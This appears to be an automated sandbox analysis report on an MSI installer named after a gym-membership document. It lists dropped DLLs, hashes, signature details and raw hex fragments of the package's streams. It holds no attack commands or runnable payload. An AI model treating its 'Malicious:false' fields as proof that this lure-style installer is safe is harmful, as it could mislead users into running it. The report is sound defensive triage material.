                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI26BB.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI294D.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSID20.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSIEE6.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSIF74.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94
                                                                                                    Entropy (8bit):4.554905870839317
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:MKVsPudd2OFNRgLLLC1wK+SOv:MKO2Tg321wK+SOv
                                                                                                    MD5:62A21E00C66B90344DB8925A3559B56D
                                                                                                    SHA1:8FA5E3B04A4B8DB7ADB07C1EE783DAC2955A136D
                                                                                                    SHA-256:CB7EA14D4C2F6AB6276EF2FFD314230C1F63E240FE14CF07756F0A71DC80A4B8
                                                                                                    SHA-512:D601E9E15EE365B846CCB450F81F04EF75D4FF702DCDA8DD86B929F13F5C7FDEDAB2955B84D520BC2660296F2AE43BF64D13F1F71CD6498A7CEC8C136D89D729
                                                                                                    Malicious:false
                                                                                                    Preview: 10/04/2021 21:28:10.344 [4660]: Setting MSI handle, install logging will go into the MSI log..
                                                                                                    \Device\ConDrv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86279
                                                                                                    Entropy (8bit):3.6471037334207934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:40Y/YeW8Y/Y/Y/YeW8Y/Y/Y/YeW8Y/Y/Y/YeW8Y/Y/Y/YeW8Y/Y/YeW8Y/Y/YeW6:O
                                                                                                    MD5:815C31193D123FDBDF9FCFE22654922F
                                                                                                    SHA1:457B133655A80DE69BD51C576B1FC8ABB50AC79B
                                                                                                    SHA-256:EC15865AB8CC46808ACEA19B2EACDA82C008E4BD0E89F8243F803B038D79E9AC
                                                                                                    SHA-512:B378DEC010B7197CA8E674E4AF28FED50386E8C5E909BCE4687C336204E0EEF78DEF4452ABDB68DD8AE9977CA6E8F2A8AE39BD19E358FD37DD88A8EFBED234ED
                                                                                                    Malicious:false
                                                                                                    Preview: -68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-99.0958739521527..-68.9090294313573..-68.9090294313573..-68.9090294313573..-99.0958739521527..-68.9090294313573..-99.09587395

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: (EMCO EVALUATION PACKAGE) - V2, Author: LTD, Keywords: Installer, Comments: This installer database contains the logic and data required to install (EMCO EVALUATION PACKAGE) - V2., Template: x64;1033, Revision Number: {549A417F-BD1F-4387-A76F-A86CCEF6964C}, Create Time/Date: Fri Oct 1 19:21:26 2021, Last Saved Time/Date: Fri Oct 1 19:21:26 2021, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.10.1.2213), Security: 2
                                                                                                    Entropy (8bit):7.951722927372294
                                                                                                    TrID:
                                                                                                    • Microsoft Windows Installer (77509/1) 90.64%
                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 9.36%
                                                                                                    File name:Nyship-Empire-Plan-Gym-Membership.msi
                                                                                                    File size:9105408
                                                                                                    MD5:f6118522893f3cd95198527d6f0282ba
                                                                                                    SHA1:dd9b59d2553043a4740b9cd557c7dde0740050cf
                                                                                                    SHA256:5cf24553e521de102628e1ebdadb69a6623904f08b51cf5b1ea14779e03e8682
                                                                                                    SHA512:cdddbba487b41d54cf117663a09dd13d374cf24eaecb16677ebe499051dd14ce5e51e65393d705c265f0a8b4234163acb4a70e0a069848ad0d519b125393dba4
                                                                                                    SSDEEP:196608:Ea/OZSY8CGlknjT573H9O5FG0xapeshnYSwFXdTFwI1M:v/LTCWSRbdeZjshYSwFXdTCA
                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                    File Icon

                                                                                                    Icon Hash:a2a0b496b2caca72

                                                                                                    Static OLE Info

                                                                                                    General

                                                                                                    Document Type:OLE
                                                                                                    Number of OLE Files:1

                                                                                                    Authenticode Signature

                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                    Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                                    Error Number:-2146762495
                                                                                                    Not Before, Not After
                                                                                                    • 9/3/2021 2:00:00 AM 8/25/2022 1:59:59 AM
                                                                                                    Subject Chain
                                                                                                    • CN=SN Pelletier Consulting Inc., O=SN Pelletier Consulting Inc., L=Marston, S=Quebec, C=CA, SERIALNUMBER=1000745-5, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:335C7BCF6D7363FB2420FFA6C37C9111
                                                                                                    Thumbprint SHA-1:B3989A6B973C0DEEDDDC240A58E3E53D71560FD6
                                                                                                    Thumbprint SHA-256:D728CDCDEFAEB2C5D53B4F290BA82F6BF66BF3A9415E4676E3EE2A13CBC7BE3F
                                                                                                    Serial:0839DC3E884FD7B0F441F0A5378ACFC0

                                                                                                    OLE File "Nyship-Empire-Plan-Gym-Membership.msi"

                                                                                                    Indicators

                                                                                                    Has Summary Info:True
                                                                                                    Application Name:Windows Installer XML Toolset (3.10.1.2213)
                                                                                                    Encrypted Document:False
                                                                                                    Contains Word Document Stream:False
                                                                                                    Contains Workbook/Book Stream:False
                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                    Contains Visio Document Stream:False
                                                                                                    Contains ObjectPool Stream:
                                                                                                    Flash Objects Count:
                                                                                                    Contains VBA Macros:False

                                                                                                    Summary

                                                                                                    Code Page:1252
                                                                                                    Title:Installation Database
                                                                                                    Subject:(EMCO EVALUATION PACKAGE) - V2
                                                                                                    Author:LTD
                                                                                                    Keywords:Installer
                                                                                                    Comments:This installer database contains the logic and data required to install (EMCO EVALUATION PACKAGE) - V2.
                                                                                                    Template:x64;1033
                                                                                                    Revion Number:{549A417F-BD1F-4387-A76F-A86CCEF6964C}
                                                                                                    Create Time:2021-10-01 18:21:26
                                                                                                    Last Saved Time:2021-10-01 18:21:26
                                                                                                    Number of Pages:200
                                                                                                    Number of Words:10
                                                                                                    Creating Application:Windows Installer XML Toolset (3.10.1.2213)
                                                                                                    Security:2

                                                                                                    Streams

                                                                                                    Stream Path: \x5DigitalSignature, File Type: data, Stream Size: 4688
                                                                                                    General
                                                                                                    Stream Path:\x5DigitalSignature
                                                                                                    File Type:data
                                                                                                    Stream Size:4688
                                                                                                    Entropy:7.59602114118
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:0 . . L . . * . H . . . . . . . . . = 0 . . 9 . . . 1 . 0 . . . + . . . . . . 0 g . . + . . . . . 7 . . . . Y 0 W 0 2 . . + . . . . . 7 . . . 0 $ . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . 0 ! 0 . . . + . . . . . . . . . Q [ . r . . . . . + l . N . . q 4 . D . . . . 0 . . . 0 . . . . . . . . . . . . @ . ` . . L . ^ . . . . . . 0 . . . * . H . . . . . . . . 0 b 1 . 0 . . . U . . . . U S 1 . 0 . . . U . . . . D i g i C e r t I n c 1 . 0 . . . U . . . . w w w . d i g i c e r t .
                                                                                                    Data Raw:30 82 12 4c 06 09 2a 86 48 86 f7 0d 01 07 02 a0 82 12 3d 30 82 12 39 02 01 01 31 0b 30 09 06 05 2b 0e 03 02 1a 05 00 30 67 06 0a 2b 06 01 04 01 82 37 02 01 04 a0 59 30 57 30 32 06 0a 2b 06 01 04 01 82 37 02 01 1e 30 24 02 01 02 04 10 f1 10 0c 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 01 00 02 01 00 02 01 00 02 01 00 02 01 00 30 21 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 0e 51 5b 00
                                                                                                    Stream Path: \x5MsiDigitalSignatureEx, File Type: data, Stream Size: 20
                                                                                                    General
                                                                                                    Stream Path:\x5MsiDigitalSignatureEx
                                                                                                    File Type:data
                                                                                                    Stream Size:20
                                                                                                    Entropy:4.12192809489
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:3 . I . . . N u \\ k . 3 Z a . $ u . . .
                                                                                                    Data Raw:33 d0 49 0e 0f cb 4e 75 5c 6b 0b 33 5a 61 a0 24 75 9e a8 d8
                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 560
                                                                                                    General
                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                    File Type:data
                                                                                                    Stream Size:560
                                                                                                    Entropy:4.83652217995
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I n s t a l l a t i o n D a t a b a s e . . . . . . . . . . . ( E M C O E V A L U A T I O N P A C K A G E ) - V 2 . . . . . . . . . .
                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 00 02 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 80 00 00 00 03 00 00 00 a0 00 00 00 04 00 00 00 c8 00 00 00 05 00 00 00 d4 00 00 00 06 00 00 00 e8 00 00 00 07 00 00 00 58 01 00 00 09 00 00 00 6c 01 00 00 0c 00 00 00 9c 01 00 00
                                                                                                    Stream Path: \x16653\x16695\x18305\x16678\x18469, File Type: Microsoft Cabinet archive data, 8173968 bytes, 2 files, Stream Size: 8173968
                                                                                                    General
                                                                                                    Stream Path:\x16653\x16695\x18305\x16678\x18469
                                                                                                    File Type:Microsoft Cabinet archive data, 8173968 bytes, 2 files
                                                                                                    Stream Size:8173968
                                                                                                    Entropy:7.99778576218
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:M S C F . . . . . . | . . . . . , . . . . . . . . . . . . . . . . . . . X . . . . . . . X ' . . . . . . . . < S . ^ . . _ p 5 _ 0 . , . . . X ' . . . . A S Z Y . . _ p 5 _ 1 . . . . W . 1 . . C K . [ . t . U . . . ) . . 4 . . . . g l . a . . . . . . ( . m 1 . . . . # & ( " . 2 . . . & . . . . . . . . ( { & . : . . . . . q . . . . . . G . _ ) . . . . . " . e w ` . . B d . . . . . . { o U w W . . 3 { . . . . . . . . . . . . . U . . . * . o n " . . . . . d . . 7 . . B . . o . I . . . \\ _ B . . o . . . 4 k
                                                                                                    Data Raw:4d 53 43 46 00 00 00 00 90 b9 7c 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 02 00 00 00 00 00 00 00 58 00 00 00 06 02 01 00 58 27 01 01 00 00 00 00 00 00 3c 53 e3 5e 00 00 5f 70 35 5f 30 00 2c be 01 00 58 27 01 01 00 00 41 53 5a 59 00 00 5f 70 35 5f 31 00 b5 c1 8f 57 f4 31 00 80 43 4b e4 5b 0b 74 14 55 9a be d5 29 92 8a 34 b9 8d b6 d2 67 6c a5 61 1b 87 20 8b 94 e0 2e 28 9e
                                                                                                    Stream Path: \x17163\x16689\x18229\x15166\x17848\x17591\x15024\x17894\x17580\x17841\x17558\x17959\x16943\x14753\x18436, File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows, Stream Size: 869280
                                                                                                    General
                                                                                                    Stream Path:\x17163\x16689\x18229\x15166\x17848\x17591\x15024\x17894\x17580\x17841\x17558\x17959\x16943\x14753\x18436
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Stream Size:869280
                                                                                                    Entropy:6.34142411578
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . q ) . I . G . I . G . I . G . . . . . C . G . . . . . . . G . . . . . P . G . . . . . K . G . B . C . F . G . B . D . @ . G . B . B . . . G . . . . . O . G . . . . . H . G . . . . . V . G . I . F . h . G . . . N . . . G . . . G . H . G . . . . . H . G .
                                                                                                    Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                                                                    Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 784
                                                                                                    General
                                                                                                    Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                                                                    File Type:data
                                                                                                    Stream Size:784
                                                                                                    Entropy:4.78240065032
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . " . " . " . ( . ( . ( . . . . . . . / . / . / . 0 . 0 . 4 . 4 . 4 . 4 . 4 . 4 . : . : . : . B . B . B . B . B . R . R . V . V . V . V . V . V . V . V . e . e . j . j . j . j . j . j . j . j . x . x . x . y . y . y . z . z . z . z . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 22 00 22 00 22 00 28 00 28 00 28 00 2e 00 2e 00 2e 00 2f 00 2f 00 2f 00 30 00 30 00 34 00 34 00 34 00 34 00 34 00 34 00 3a 00 3a 00 3a 00 42 00 42 00 42 00 42 00 42 00 52 00 52 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 65 00 65 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 78 00 78 00 78 00 79 00 79 00 79 00
                                                                                                    Stream Path: \x18496\x15958\x18379\x17947\x15025\x17894\x17580\x17841, File Type: data, Stream Size: 36
                                                                                                    General
                                                                                                    Stream Path:\x18496\x15958\x18379\x17947\x15025\x17894\x17580\x17841
                                                                                                    File Type:data
                                                                                                    Stream Size:36
                                                                                                    Entropy:2.61034676941
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:a6 01 a9 01 23 00 aa 01 a7 01 ab 01 a8 01 00 00 01 00 00 80 01 00 00 80 00 00 00 80 00 00 00 80 02 80 01 80
                                                                                                    Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with CRLF line terminators, Stream Size: 13289
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                    Stream Size:13289
                                                                                                    Entropy:5.04004187381
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:N a m e T a b l e T y p e C o l u m n _ V a l i d a t i o n I d e n t i f i e r V a l u e N P r o p e r t y I d _ S u m m a r y I n f o r m a t i o n D e s c r i p t i o n S e t C a t e g o r y K e y T a b l e M a x V a l u e N u l l a b l e K e y C o l u m n M i n V a l u e N a m e o f t a b l e N a m e o f c o l u m n Y ; N W h e t h e r t h e c o l u m n i s n u l l a b l e Y M i n i m u m v a l u e a l l o w e d M a x i m u m v a l u e a l l o w e d F o r f o r e i g n k e y
                                                                                                    Data Raw:4e 61 6d 65 54 61 62 6c 65 54 79 70 65 43 6f 6c 75 6d 6e 5f 56 61 6c 69 64 61 74 69 6f 6e 49 64 65 6e 74 69 66 69 65 72 56 61 6c 75 65 4e 50 72 6f 70 65 72 74 79 49 64 5f 53 75 6d 6d 61 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 44 65 73 63 72 69 70 74 69 6f 6e 53 65 74 43 61 74 65 67 6f 72 79 4b 65 79 54 61 62 6c 65 4d 61 78 56 61 6c 75 65 4e 75 6c 6c 61 62 6c 65 4b 65 79 43 6f 6c 75
                                                                                                    Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 1820
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                                                                    File Type:data
                                                                                                    Stream Size:1820
                                                                                                    Entropy:3.27018977842
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . . . . . j . . . . . . . B . . . . . . . . . . . . . . . o . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . ; . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . .
                                                                                                    Data Raw:e4 04 00 00 04 00 04 00 05 00 02 00 00 00 00 00 04 00 02 00 06 00 02 00 0b 00 15 00 0a 00 1b 00 05 00 05 00 01 00 36 00 0a 00 01 00 13 00 02 00 0b 00 06 00 03 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 0d 00 01 00 0e 00 01 00 03 00 01 00 1e 00 01 00 01 00 2e 00 15 00 01 00 15 00 01 00 36 00 01 00 24 00 01 00 f5 00 01 00 0f 00 01 00 04 00 0a 00
                                                                                                    Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 42
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                                                                    File Type:data
                                                                                                    Stream Size:42
                                                                                                    Entropy:3.19615871139
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . " . ( . . . / . 0 . 4 . : . B . R . V . e . j . x . y . z . . . . . . . . . . .
                                                                                                    Data Raw:06 00 22 00 28 00 2e 00 2f 00 30 00 34 00 3a 00 42 00 52 00 56 00 65 00 6a 00 78 00 79 00 7a 00 85 00 87 00 95 00 9f 00 a9 00
                                                                                                    Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 2400
                                                                                                    General
